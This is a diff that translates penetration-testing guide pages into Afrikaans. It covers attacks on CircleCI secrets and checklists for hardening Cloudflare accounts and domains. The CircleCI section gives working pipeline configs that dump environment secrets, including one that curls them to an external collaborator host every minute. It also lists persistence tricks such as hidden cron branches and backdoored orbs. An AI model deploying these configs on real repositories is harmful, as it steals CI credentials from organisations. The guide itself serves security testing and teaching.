+U kan dit in duidelike teks binne die **omgewing van 'n houer** verklaar:
 ```yaml
 jobs:
-    build-job:
-        docker:
-            - image: cimg/base:2020.01
-                environment:
-                    SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
 ```
+#### Projek Geheime
 
-#### Project Secrets
-
-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
+Dit is **geheime** wat slegs deur die **projek** (deur **enige tak**) **toeganklik** gaan wees.\
+Jy kan hulle **verklaar in** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
 
 ![](<../images/image (129).png>)
 
 > [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
+> Die "**Import Variabels**" funksionaliteit laat toe om **variabels van ander projekte** na hierdie een te **importeer**.
 
-#### Context Secrets
+#### Konteks Geheime
 
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
+Dit is geheime wat **organisasie wye** is. Deur **verstek kan enige repo** **enige geheim** wat hier gestoor is **toegang** hê:
 
 ![](<../images/image (123).png>)
 
 > [!TIP]
-> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
+> Let egter daarop dat 'n ander groep (in plaas van Alle lede) kan wees **geselekteer om slegs toegang tot die geheime aan spesifieke mense** te gee.\
+> Dit is tans een van die beste maniere om die **veiligheid van die geheime** te **verhoog**, om nie te laat dat almal toegang het nie, maar net sommige mense.
 
-### Attacks
+### Aanvalle
 
-#### Search Clear Text Secrets
+#### Soek Duidelike Teks Geheime
 
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
+As jy **toegang het tot die VCS** (soos github) kyk na die lêer `.circleci/config.yml` van **elke repo op elke tak** en **soek** na potensiële **duidelike teks geheime** wat daar gestoor is.
 
-#### Secret Env Vars & Context enumeration
+#### Geheime Omgewing Variabelen & Konteks enumerasie
 
-Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
+Deur die kode na te gaan kan jy **alle geheime name** vind wat in elke `.circleci/config.yml` lêer **gebruik** word. Jy kan ook die **konteks name** van daardie lêers kry of hulle in die webkonsol nagaan: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
 
-#### Exfiltrate Project secrets
+#### Ekstrakteer Projek geheime
 
 > [!WARNING]
-> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
+> Ten einde om **ALLES** van die projek en konteks **GEHEIME** te **ekstrakteer** moet jy **net** **SKRYF** toegang hê tot **net 1 repo** in die hele github organisasie (_en jou rekening moet toegang hê tot die kontekste, maar deur verstek kan almal toegang hê tot elke konteks_).
 
 > [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-
-All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
+> Die "**Import Variabels**" funksionaliteit laat toe om **variabels van ander projekte** na hierdie een te **importeer**. Daarom kan 'n aanvaller **alle projekvariabels van al die repos** **importeer** en dan **almal saam ekstrakteer**.
 
+Alle projek geheime is altyd in die omgewing van die werksgeleenthede ingestel, so net deur om omgewing aan te roep en dit in base64 te obfuskeer, sal die geheime in die **werkvloei weblogkonsol** geëkstrakteer word:
 ```yaml
 version: 2.1
 
 jobs:
-  exfil-env:
-    docker:
-      - image: cimg/base:stable
-    steps:
-      - checkout
-      - run:
-          name: "Exfil env"
-          command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
 
 workflows:
-  exfil-env-workflow:
-    jobs:
-      - exfil-env
+exfil-env-workflow:
+jobs:
+- exfil-env
 ```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+As jy **nie toegang tot die webkonsol** het nie, maar jy het **toegang tot die repo** en jy weet dat CircleCI gebruik word, kan jy net **n werkvloei skep** wat **elke minuut geaktiveer word** en wat **die geheime na 'n eksterne adres uitvoer**:
 ```yaml
 version: 2.1
 
 jobs:
-  exfil-env:
-    docker:
-      - image: cimg/base:stable
-    steps:
-      - checkout
-      - run:
-          name: "Exfil env"
-          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
 
 # I filter by the repo branch where this config.yaml file is located: circleci-project-setup
 workflows:
-  exfil-env-workflow:
-    triggers:
-      - schedule:
-          cron: "* * * * *"
-          filters:
-            branches:
-              only:
-                - circleci-project-setup
-    jobs:
-      - exfil-env
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env
 ```
+#### Exfiltreer Konteks Geheime
 
-#### Exfiltrate Context Secrets
-
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
+Jy moet **die konteksnaam spesifiseer** (dit sal ook die projekgeheime eksfiltreer):
 ```yaml
 version: 2.1
 
 jobs:
-  exfil-env:
-    docker:
-      - image: cimg/base:stable
-    steps:
-      - checkout
-      - run:
-          name: "Exfil env"
-          command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
 
 workflows:
-  exfil-env-workflow:
-    jobs:
-      - exfil-env:
-          context: Test-Context
+exfil-env-workflow:
+jobs:
+- exfil-env:
+context: Test-Context
 ```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+As jy **nie toegang tot die webkonsol** het nie, maar jy het **toegang tot die repo** en jy weet dat CircleCI gebruik word, kan jy net **'n werksvloei aanpas** wat **elke minuut geaktiveer word** en wat **die geheime na 'n eksterne adres stuur**:
 ```yaml
 version: 2.1
 
 jobs:
-  exfil-env:
-    docker:
-      - image: cimg/base:stable
-    steps:
-      - checkout
-      - run:
-          name: "Exfil env"
-          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
 
 # I filter by the repo branch where this config.yaml file is located: circleci-project-setup
 workflows:
-  exfil-env-workflow:
-    triggers:
-      - schedule:
-          cron: "* * * * *"
-          filters:
-            branches:
-              only:
-                - circleci-project-setup
-    jobs:
-      - exfil-env:
-          context: Test-Context
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env:
+context: Test-Context
 ```
-
 > [!WARNING]
-> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
+> Om net 'n nuwe `.circleci/config.yml` in 'n repo te skep **is nie genoeg om 'n circleci bou te aktiveer nie**. Jy moet dit **as 'n projek in die circleci konsole aktiveer**.
 
-#### Escape to Cloud
+#### Ontsnap na die Wolk
 
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
-Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
+**CircleCI** gee jou die opsie om **jou boue in hul masjiene of in jou eie** te laat loop.\
+Standaard is hul masjiene geleë in GCP, en jy sal aanvanklik nie enigiets relevants kan vind nie. As 'n slagoffer egter die take in **hulle eie masjiene (potensieel, in 'n wolk omgewing)** uitvoer, kan jy 'n **wolk metadata eindpunt met interessante inligting daarop** vind.
 
+Let daarop dat in die vorige voorbeelde alles binne 'n docker houer gelanseer is, maar jy kan ook **vra om 'n VM masjien te lanseer** (wat dalk verskillende wolk toestemmings kan hê):
 ```yaml
 jobs:
-  exfil-env:
-    #docker:
-    #  - image: cimg/base:stable
-    machine:
-      image: ubuntu-2004:current
+exfil-env:
+#docker:
+#  - image: cimg/base:stable
+machine:
+image: ubuntu-2004:current
 ```
-
-Or even a docker container with access to a remote docker service:
-
+Of selfs 'n docker-container met toegang tot 'n afstands-docker-diens:
 ```yaml
 jobs:
-  exfil-env:
-    docker:
-      - image: cimg/base:stable
-    steps:
-      - checkout
-      - setup_remote_docker:
-          version: 19.03.13
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- setup_remote_docker:
+version: 19.03.13
 ```
+#### Volharding
 
-#### Persistence
-
-- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
-  - _https://app.circleci.com/settings/user/tokens_
-- It's possible to **create projects tokens** to access the project with the permissions given to the token.
-  - _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
-- It's possible to **add SSH keys** to the projects.
-  - _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
-- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
-  - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
-- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
-- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
+- Dit is moontlik om **gebruikertokens in CircleCI** te **skep** om toegang te verkry tot die API-eindpunte met die gebruikers se toegang.
+- _https://app.circleci.com/settings/user/tokens_
+- Dit is moontlik om **projektokens** te **skep** om toegang te verkry tot die projek met die toestemmings wat aan die token gegee is.
+- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
+- Dit is moontlik om **SSH-sleutels** aan die projekte toe te voeg.
+- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
+- Dit is moontlik om 'n **cron-taak in 'n verborge tak** te **skep** in 'n onverwagte projek wat elke dag al die **context env** vars **lek**.
+- Of selfs in 'n tak te **skep** / 'n bekende taak te **wysig** wat elke dag al die context en **projeksecrets** sal **lek**.
+- As jy 'n github-eienaar is, kan jy **ongeverifieerde orbs** **toelaat** en een in 'n taak as **achterdeur** konfigureer.
+- Jy kan 'n **opdraginjektievulnerabiliteit** in sommige take vind en **opdragte** via 'n **geheim** **injekteer** deur sy waarde te **wysig**.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md
index 77d2c2c50..2771189de 100644
--- a/src/pentesting-ci-cd/cloudflare-security/README.md
+++ b/src/pentesting-ci-cd/cloudflare-security/README.md
@@ -2,76 +2,76 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+In 'n Cloudflare-rekening is daar 'n paar **generale instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheid-verwante instellings van elke afdeling analiseer:**
 
 <figure><img src="../../images/image (117).png" alt=""><figcaption></figcaption></figure>
 
 ## Websites
 
-Review each with:
+Herbekyk elkeen met:
 
 {{#ref}}
 cloudflare-domains.md
 {{#endref}}
 
-### Domain Registration
+### Domein Registrasie
 
-- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
+- [ ] In **`Transfer Domains`** kyk dat dit nie moontlik is om enige domein oor te dra nie.
 
-Review each with:
+Herbekyk elkeen met:
 
 {{#ref}}
 cloudflare-domains.md
 {{#endref}}
 
-## Analytics
+## Analise
 
-_I couldn't find anything to check for a config security review._
+_Ek kon niks vind om 'n konfigurasie veiligheid hersiening te doen nie._
 
-## Pages
+## Bladsye
 
-On each Cloudflare's page:
+Op elke Cloudflare se bladsy:
 
-- [ ] Check for **sensitive information** in the **`Build log`**.
-- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
-- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
-- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
-- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
-- [ ] In the details of each page `/<page_id>/pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
-- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
+- [ ] Kyk vir **sensitiewe inligting** in die **`Build log`**.
+- [ ] Kyk vir **sensitiewe inligting** in die **Github-repo** wat aan die bladsye toegeken is.
+- [ ] Kyk vir potensiële github repo kompromie via **workflow command injection** of `pull_request_target` kompromie. Meer inligting in die [**Github Veiligheid bladsy**](../github-security/).
+- [ ] Kyk vir **kwesbare funksies** in die `/fuctions` gids (indien enige), kyk die **omleidings** in die `_redirects` lêer (indien enige) en **misgeconfigureerde koppe** in die `_headers` lêer (indien enige).
+- [ ] Kyk vir **kwesbaarhede** in die **web bladsy** via **blackbox** of **whitebox** as jy die **kode** kan **toegang**.
+- [ ] In die besonderhede van elke bladsy `/<page_id>/pages/view/blocklist/settings/functions`. Kyk vir **sensitiewe inligting** in die **`Environment variables`**.
+- [ ] In die besonderhede bladsy kyk ook die **bou opdrag** en **wortel gids** vir **potensiële inspuitings** om die bladsy te kompromitteer.
 
 ## **Workers**
 
-On each Cloudflare's worker check:
+Op elke Cloudflare se werker kyk:
 
-- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
-- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
-- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
-  - Check for SSRFs returning the indicated page that you can control
-  - Check XSSs executing JS inside a svg image
-  - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
+- [ ] Die triggers: Wat maak die werker om te trigger? Kan 'n **gebruiker data stuur** wat deur die werker **gebruik** sal word?
+- [ ] In die **`Settings`**, kyk vir **`Variables`** wat **sensitiewe inligting** bevat.
+- [ ] Kyk die **kode van die werker** en soek vir **kwesbaarhede** (veral in plekke waar die gebruiker die invoer kan bestuur).
+- Kyk vir SSRFs wat die aangeduide bladsy teruggee wat jy kan beheer.
+- Kyk vir XSS's wat JS binne 'n svg beeld uitvoer.
+- Dit is moontlik dat die werker met ander interne dienste interaksie het. Byvoorbeeld, 'n werker kan met 'n R2-bucket interaksie hê wat inligting daarin stoor wat van die invoer verkry is. In daardie geval sal dit nodig wees om te kyk watter vermoëns die werker oor die R2-bucket het en hoe dit misbruik kan word vanaf die gebruikersinvoer.
 
 > [!WARNING]
-> Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
+> Let daarop dat 'n **Werker standaard 'n URL gegee word** soos `<worker-name>.<account>.workers.dev`. Die gebruiker kan dit op 'n **subdomein** stel, maar jy kan dit altyd met daardie **oorspronklike URL** toegang as jy dit weet.
 
 ## R2
 
-On each R2 bucket check:
+Op elke R2-bucket kyk:
 
-- [ ] Configure **CORS Policy**.
+- [ ] Konfigureer **CORS-beleid**.
 
-## Stream
+## Stroom
 
 TODO
 
-## Images
+## Beelde
 
 TODO
 
-## Security Center
+## Veiligheid Sentrum
 
-- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
-- [ ] Just **check this information** for security misconfigurations and interesting info
+- [ ] As moontlik, voer 'n **`Security Insights`** **skandering** en 'n **`Infrastructure`** **skandering** uit, aangesien dit **interessante inligting** **veiligheid** wys.
+- [ ] Kyk net na **hierdie inligting** vir veiligheid misconfigurasies en interessante inligting.
 
 ## Turnstile
 
@@ -83,56 +83,52 @@ TODO
 cloudflare-zero-trust-network.md
 {{#endref}}
 
-## Bulk Redirects
+## Groot Omleidings
 
 > [!NOTE]
-> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
+> Anders as [Dinamiese Omleidings](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Groot Omleidings**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) is essensieel staties — hulle ondersteun **nie enige string vervangings** operasies of gereelde uitdrukkings nie. Dit is egter moontlik om URL omleidingsparameters te konfigureer wat hul URL ooreenkoms gedrag en hul runtime gedrag beïnvloed.
 
-- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
-- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
+- [ ] Kyk dat die **uitdrukkings** en **vereistes** vir omleidings **sinvol is**.
+- [ ] Kyk ook vir **sensitiewe verborge eindpunte** wat jy interessante inligting bevat.
 
-## Notifications
+## Kennisgewings
 
-- [ ] Check the **notifications.** These notifications are recommended for security:
-  - `Usage Based Billing`
-  - `HTTP DDoS Attack Alert`
-  - `Layer 3/4 DDoS Attack Alert`
-  - `Advanced HTTP DDoS Attack Alert`
-  - `Advanced Layer 3/4 DDoS Attack Alert`
-  - `Flow-based Monitoring: Volumetric Attack`
-  - `Route Leak Detection Alert`
-  - `Access mTLS Certificate Expiration Alert`
-  - `SSL for SaaS Custom Hostnames Alert`
-  - `Universal SSL Alert`
-  - `Script Monitor New Code Change Detection Alert`
-  - `Script Monitor New Domain Alert`
-  - `Script Monitor New Malicious Domain Alert`
-  - `Script Monitor New Malicious Script Alert`
-  - `Script Monitor New Malicious URL Alert`
-  - `Script Monitor New Scripts Alert`
-  - `Script Monitor New Script Exceeds Max URL Length Alert`
-  - `Advanced Security Events Alert`
-  - `Security Events Alert`
-- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
-  - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
+- [ ] Kyk die **kennisgewings.** Hierdie kennisgewings word aanbeveel vir veiligheid:
+- `Usage Based Billing`
+- `HTTP DDoS Attack Alert`
+- `Layer 3/4 DDoS Attack Alert`
+- `Advanced HTTP DDoS Attack Alert`
+- `Advanced Layer 3/4 DDoS Attack Alert`
+- `Flow-based Monitoring: Volumetric Attack`
+- `Route Leak Detection Alert`
+- `Access mTLS Certificate Expiration Alert`
+- `SSL for SaaS Custom Hostnames Alert`
+- `Universal SSL Alert`
+- `Script Monitor New Code Change Detection Alert`
+- `Script Monitor New Domain Alert`
+- `Script Monitor New Malicious Domain Alert`
+- `Script Monitor New Malicious Script Alert`
+- `Script Monitor New Malicious URL Alert`
+- `Script Monitor New Scripts Alert`
+- `Script Monitor New Script Exceeds Max URL Length Alert`
+- `Advanced Security Events Alert`
+- `Security Events Alert`
+- [ ] Kyk al die **bestemmings**, aangesien daar **sensitiewe inligting** (basiese http auth) in webhook urls kan wees. Maak ook seker dat webhook urls **HTTPS** gebruik.
+- [ ] As ekstra kontrole, kan jy probeer om 'n **cloudflare kennisgewing** na 'n derde party te **verpersoonlik**, miskien kan jy op een of ander manier **iets gevaarliks inspuit**.
 
-## Manage Account
+## Bestuur Rekening
 
-- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
-- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
-- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
-  - Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
-- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
+- [ ] Dit is moontlik om die **laaste 4 syfers van die kredietkaart**, **verval** tyd en **faktuur adres** in **`Billing` -> `Payment info`** te sien.
+- [ ] Dit is moontlik om die **plan tipe** wat in die rekening gebruik word in **`Billing` -> `Subscriptions`** te sien.
+- [ ] In **`Members`** is dit moontlik om al die lede van die rekening en hul **rol** te sien. Let daarop dat as die plan tipe nie Enterprise is nie, bestaan daar slegs 2 rolle: Administrateur en Super Administrateur. Maar as die gebruikte **plan Enterprise** is, kan [**meer rolle**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) gebruik word om die minste voorregte beginsel te volg.
+- Daarom, wanneer moontlik, is dit **aanbeveel** om die **Enterprise plan** te gebruik.
+- [ ] In Lede is dit moontlik om te kyk watter **lede** **2FA geaktiveer** het. **Elke** gebruiker moet dit geaktiveer hê.
 
 > [!NOTE]
-> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
+> Let daarop dat gelukkig die rol **`Administrator`** nie toestemming gee om lidmaatskappe te bestuur nie (**kan nie voorregte verhoog of nuwe lede nooi nie**).
 
-## DDoS Investigation
+## DDoS Ondersoek
 
-[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
+[Kyk hierdie deel](cloudflare-domains.md#cloudflare-ddos-protection).
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
index 02989e685..9fe9235b9 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -2,31 +2,31 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+In elke TLD wat in Cloudflare gekonfigureer is, is daar 'n paar **algemene instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheidsverwante instellings van elke afdeling analiseer:**
 
 <figure><img src="../../images/image (101).png" alt=""><figcaption></figcaption></figure>
 
-### Overview
+### Oorsig
 
-- [ ] Get a feeling of **how much** are the services of the account **used**
-- [ ] Find also the **zone ID** and the **account ID**
+- [ ] Kry 'n gevoel van **hoeveel** die dienste van die rekening **gebruik** word
+- [ ] Vind ook die **zone ID** en die **rekening ID**
 
-### Analytics
+### Analise
 
-- [ ] In **`Security`** check if there is any **Rate limiting**
+- [ ] In **`Security`** kyk of daar enige **Tarief beperking** is
 
 ### DNS
 
-- [ ] Check **interesting** (sensitive?) data in DNS **records**
-- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
-- [ ] Check for web pages that **aren't** **proxied**
-- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
-- [ ] Check that **DNSSEC** is **enabled**
-- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
-  - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
-- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
+- [ ] Kyk na **interessante** (sensitiewe?) data in DNS **rekords**
+- [ ] Kyk vir **subdomeine** wat **sensitiewe inligting** kan bevat net gebaseer op die **naam** (soos admin173865324.domin.com)
+- [ ] Kyk vir webbladsye wat **nie** **geproksie** is nie
+- [ ] Kyk vir **geproksie webbladsye** wat direk deur CNAME of IP adres **toeganklik** is
+- [ ] Kyk dat **DNSSEC** **geaktiveer** is
+- [ ] Kyk dat **CNAME Flattening** in **alle CNAMEs** **gebruik** word
+- Dit kan nuttig wees om **subdomein oorneem kwesbaarhede** te **versteek** en laai tyds te verbeter
+- [ ] Kyk dat die domeine [**nie kwesbaar is vir spoofing nie**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
 
-### **Email**
+### **E-pos**
 
 TODO
 
@@ -36,82 +36,82 @@ TODO
 
 ### SSL/TLS
 
-#### **Overview**
+#### **Oorsig**
 
-- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
-- [ ] The **SSL/TLS Recommender** should be enabled
+- [ ] Die **SSL/TLS enkripsie** moet **Vol** of **Vol (Streng)** wees. Enige ander sal **duidelike teks verkeer** op 'n sekere punt stuur.
+- [ ] Die **SSL/TLS Aanbeveler** moet geaktiveer wees
 
-#### Edge Certificates
+#### Rand Sertifikate
 
-- [ ] **Always Use HTTPS** should be **enabled**
-- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
-- [ ] **Minimum TLS Version should be 1.2**
-- [ ] **TLS 1.3 should be enabled**
-- [ ] **Automatic HTTPS Rewrites** should be **enabled**
-- [ ] **Certificate Transparency Monitoring** should be **enabled**
+- [ ] **Gebruik altyd HTTPS** moet **geaktiveer** wees
+- [ ] **HTTP Streng Vervoer Sekuriteit (HSTS)** moet **geaktiveer** wees
+- [ ] **Minimum TLS Weergawe moet 1.2 wees**
+- [ ] **TLS 1.3 moet geaktiveer wees**
+- [ ] **Outomatiese HTTPS Herskrywings** moet **geaktiveer** wees
+- [ ] **Sertifikaat Deursigtigheid Monitering** moet **geaktiveer** wees
 
-### **Security**
+### **Veiligheid**
 
-- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
-  - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
-- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
-- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
-- [ ] In the **`Settings`** section:
-  - [ ] Check that the **`Security Level`** is **medium** or greater
-  - [ ] Check that the **`Challenge Passage`** is 1 hour at max
-  - [ ] Check that the **`Browser Integrity Check`** is **enabled**
-  - [ ] Check that the **`Privacy Pass Support`** is **enabled**
+- [ ] In die **`WAF`** afdeling is dit interessant om te kyk dat **Firewall** en **tarief beperking reëls gebruik word** om misbruik te voorkom.
+- Die **`Bypass`** aksie sal **Cloudflare sekuriteit** funksies vir 'n versoek **deaktiveer**. Dit moet nie gebruik word nie.
+- [ ] In die **`Page Shield`** afdeling word dit aanbeveel om te kyk dat dit **geaktiveer** is as enige bladsy gebruik word
+- [ ] In die **`API Shield`** afdeling word dit aanbeveel om te kyk dat dit **geaktiveer** is as enige API in Cloudflare blootgestel word
+- [ ] In die **`DDoS`** afdeling word dit aanbeveel om die **DDoS beskermings** te aktiveer
+- [ ] In die **`Instellings`** afdeling:
+- [ ] Kyk dat die **`Veiligheidsvlak`** **medium** of groter is
+- [ ] Kyk dat die **`Uitdaging Deurgang`** 1 uur maksimum is
+- [ ] Kyk dat die **`Bladsy Integriteit Kontrole`** **geaktiveer** is
+- [ ] Kyk dat die **`Privaatheid Pas Ondersteuning`** **geaktiveer** is
 
-#### **CloudFlare DDoS Protection**
+#### **CloudFlare DDoS Beskerming**
 
-- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
-- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
-  - If the attack is from a **verified bot**, at least **add a rate limit** to bots.
-  - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
-  - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
-  - Check if **Managed rules** could also help to prevent vulnerability exploitations.
-  - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
-- In DDoS you could **override some rules to make them more restrictive**.
-- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
-- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
-- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
+- As jy kan, aktiveer **Bot Strijd Modus** of **Super Bot Strijd Modus**. As jy 'n API beskerm wat programmaties toeganklik is (van 'n JS front end bladsy byvoorbeeld). Jy mag dalk nie in staat wees om dit te aktiveer sonder om daardie toegang te breek nie.
+- In **WAF**: Jy kan **tarief beperkings per URL pad** of vir **geverifieerde bots** (Tarief beperking reëls) skep, of om **toegang te blokkeer** gebaseer op IP, Koekie, verwysing...). So jy kan versoeke blokkeer wat nie van 'n webblad kom nie of 'n koekie het.
+- As die aanval van 'n **geverifieerde bot** is, voeg ten minste 'n **tarief beperking** by vir bots.
+- As die aanval op 'n **spesifieke pad** is, voeg as voorkomingsmeganisme 'n **tarief beperking** in hierdie pad by.
